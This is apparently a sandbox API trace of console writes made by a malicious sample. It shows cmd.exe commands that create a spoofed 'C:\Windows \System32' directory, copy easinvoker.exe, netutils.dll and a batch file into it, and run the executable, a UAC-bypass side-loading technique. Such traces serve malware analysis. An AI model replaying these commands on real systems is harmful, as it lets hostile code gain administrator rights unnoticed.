WriteConsoleW
|
buffer:
C:\Users\Public\Libraries>
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
cmd.exe
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
/c mkdir "\\?\C:\Windows "
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
C:\Users\Public\Libraries>
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
cmd.exe
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
/c mkdir "\\?\C:\Windows \System32"
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
C:\Users\Public\Libraries>
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
cmd.exe
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
/c ECHO F
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
xcopy
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
"easinvoker.exe" "C:\Windows \System32\" /K /D /H /Y
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
C:\Users\Public\Libraries>
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
cmd.exe
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
/c ECHO F
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
xcopy
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
"netutils.dll" "C:\Windows \System32\" /K /D /H /Y
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
C:\Users\Public\Libraries>
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
cmd.exe
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
/c ECHO F
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
xcopy
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
"KDECO.bat" "C:\Windows \System32\" /K /D /H /Y
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
C:\Users\Public\Libraries>
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
"C:\Windows \System32\easinvoker.exe"
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
The system cannot execute the specified program.
console_handle:
0x0000000b
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
C:\Users\Public\Libraries>
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
ping
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
127.0.0.1 -n 6
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
nul
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
The batch file cannot be found.
console_handle:
0x0000000b
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
C:easinvoker.exe
console_handle:
0x00000003
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
1 File(s) copied
console_handle:
0x00000003
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
C:netutils.dll
console_handle:
0x00000003
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
1 File(s) copied
console_handle:
0x00000003
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
C:KDECO.bat
console_handle:
0x00000003
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
1 File(s) copied
console_handle:
0x00000003
|
1
|
1 |
0
|